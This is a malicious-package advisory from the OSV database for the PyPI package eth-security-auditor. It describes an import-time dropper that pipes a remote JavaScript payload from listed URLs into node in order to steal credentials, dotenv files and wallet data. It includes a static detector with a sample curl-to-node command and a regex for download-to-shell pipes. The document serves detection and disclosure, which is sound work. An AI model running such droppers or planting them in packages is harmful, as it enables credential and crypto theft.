MAL-2026-4261

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/eth-security-auditor/MAL-2026-4261.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4261
Published
2026-05-22T20:30:51Z
Modified
2026-05-26T06:03:10.353656003Z
Summary
Malicious code in eth-security-auditor (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8e20bc5304d65563ad8b577a38c26db0b04746828b554f88cf5dd1215a214cf1)

On import, eth_security_auditor/__init__.py unconditionally fetches a JavaScript payload from https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js using curl and pipes the response into node -e, executing arbitrary remote code on the installer's machine. The URL is unpinned, no hash or signature check is performed, errors are silently swallowed, and the host is a personal GitHub Pages account that does not match the package's claimed publisher (github.com/solidity-security-alliance). The package brands itself as an Ethereum security auditor to add credibility, which conflicts with the personal-account payload host and the use of Node.js to execute remote JS from a Python package's import path. This is a textbook dropper: mutable attacker-controlled URL, executed at every first import, with no opt-in.
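A static check for the dropper shape described above (a download piped into node, spawned from module-level code so it runs on import), as an added example that is not part of the OSV record or of either analysis source. It parses a candidate __init__.py with the ast module and never executes it; the sample module and its URL are constructed placeholders.

```python
import ast
import re
# Download piped straight into an interpreter: the record's curl ... | node -e shape.
PIPE_TO_INTERP = re.compile(r"\b(curl|wget)\b.*\|\s*(node|sh|bash|python3?)\b")
# Callables that hand a command string to a shell or spawn a process.
EXEC_FUNCS = {"run", "call", "check_output", "check_call", "Popen", "system", "popen"}

def _import_time_calls(tree: ast.Module):
    """Yield Call nodes reachable without entering a def/class/lambda body,
    i.e. code that runs as a side effect of `import` (try/except included)."""
    stack = list(tree.body)
    while stack:
        node = stack.pop()
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)):
            continue  # only reached when something calls it, not at import
        if isinstance(node, ast.Call):
            yield node
        stack.extend(ast.iter_child_nodes(node))

def _callee(call: ast.Call) -> str:
    f = call.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")

def _literal_args(call: ast.Call):
    # Positional string literals, plus the literal parts of f-strings.
    for arg in call.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            yield arg.value
        elif isinstance(arg, ast.JoinedStr):
            yield "".join(v.value for v in arg.values if isinstance(v, ast.Constant))

def find_import_time_droppers(source: str):
    """Return sorted [(lineno, command)] for import-time process spawns whose
    command pipes a download into an interpreter. Static only; nothing is run."""
    hits = []
    for call in _import_time_calls(ast.parse(source)):
        if _callee(call) in EXEC_FUNCS:
            hits += [(call.lineno, c) for c in _literal_args(call) if PIPE_TO_INTERP.search(c)]
    return sorted(hits)

# Constructed sample in the shape the record describes; the URL is a placeholder.
SAMPLE_INIT = """\
import subprocess
try:
    subprocess.run('curl -sL https://example.invalid/scanner.js | node -', shell=True)
except Exception:
    pass
def audit(path):
    return subprocess.run(['solc', path], capture_output=True)
"""
```

Run `find_import_time_droppers` over each `__init__.py` in a wheel before installing it; a hit on module-level code is the signal to quarantine the package rather than proceed.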

Source: kam193 (f08c76ae889813c4d48537a2fb0d3efbd359de58ff3952f00053ea4940bdedfc)

During import, the package downloads a remote JS script that then exfiltrates environment variables, dotenv files, crypto wallet data and other sensitive information. It's part of a broader campaign across PyPI, npm and GitHub.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-eth-security-auditor

Reasons (based on the campaign):

  • files-exfiltration

  • exfiltration-env-variables

  • crypto-related

  • Downloads and executes a remote malicious script.

  • exfiltration-crypto

  • exfiltration-credentials

Database specific
{
    "malicious-packages-origins": [
        {
            "source": "kam193",
            "id": "pypi/2026-05-eth-security-auditor/eth-security-auditor",
            "sha256": "f08c76ae889813c4d48537a2fb0d3efbd359de58ff3952f00053ea4940bdedfc",
            "versions": [
                "0.1.0"
            ],
            "import_time": "2026-05-22T21:55:13.069543692Z",
            "modified_time": "2026-05-22T21:30:30.9097Z"
        },
        {
            "source": "kam193",
            "import_time": "2026-05-24T06:19:57.540485446Z",
            "sha256": "96635dab56130f85f55fbbacffc215c94e9ca556640d05d381a1d58998d6c794",
            "id": "pypi/2026-05-eth-security-auditor/eth-security-auditor",
            "versions": [
                "0.1.0"
            ],
            "modified_time": "2026-05-22T21:30:30.9097Z"
        },
        {
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:14.874616951Z",
            "sha256": "8e20bc5304d65563ad8b577a38c26db0b04746828b554f88cf5dd1215a214cf1",
            "id": "IN-MAL-2026-004256",
            "versions": [
                "0.1.0"
            ],
            "modified_time": "2026-05-22T20:30:51Z"
        }
    ],
    "iocs": {
        "domains": [
            "ddjidd564.github.io"
        ],
        "urls": [
            "https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js",
            "https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js"
        ]
    }
}
References
Credits

Affected packages

PyPI / eth-security-auditor

Package

Name
eth-security-auditor
Purl
pkg:pypi/eth-security-auditor

Affected ranges

Affected versions

0.*
0.1.0

Database specific

indicators
{
    "package_integrity": [
        {
            "hashes": {
                "md5": "3387e4b595e3cbb7a96c5d3e58b79424",
                "sha256": "27512ee5687ee7d89c235011143d51b61952a05e17bf94e73654c114592cb35a",
                "blake2b_256": "8945d5133c53c4fa24ba2e1b46ad18a1362ff9e237bb2ee1d2edd35a87c61a61"
            },
            "filename": "eth_security_auditor-0.1.0-py3-none-any.whl"
        }
    ],
    "evidence_files": [
        {
            "tlsh": "3f41d1369c9a7630b396c06f4516b1055b8875c3b80c2429b9bcb2236fed168d277bbc",
            "sha256": "d1a058dc8663d4925aac9206b1bc0d85ededd0b60f876ed762fe9ffa275e143d",
            "path": "eth_security_auditor/__init__.py"
        },
        {
            "tlsh": "0d216f0322cbb9b448d2098b5772f6c91e029b48fa4d104f56e8a20be7d20d0c33f3b2",
            "sha256": "24a31bfb78be1f810b83a3e858b143b82ad150b40edd9b07e2b3434996b3a053",
            "path": "eth_security_auditor-0.1.0.dist-info/METADATA"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/eth-security-auditor/MAL-2026-4261.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]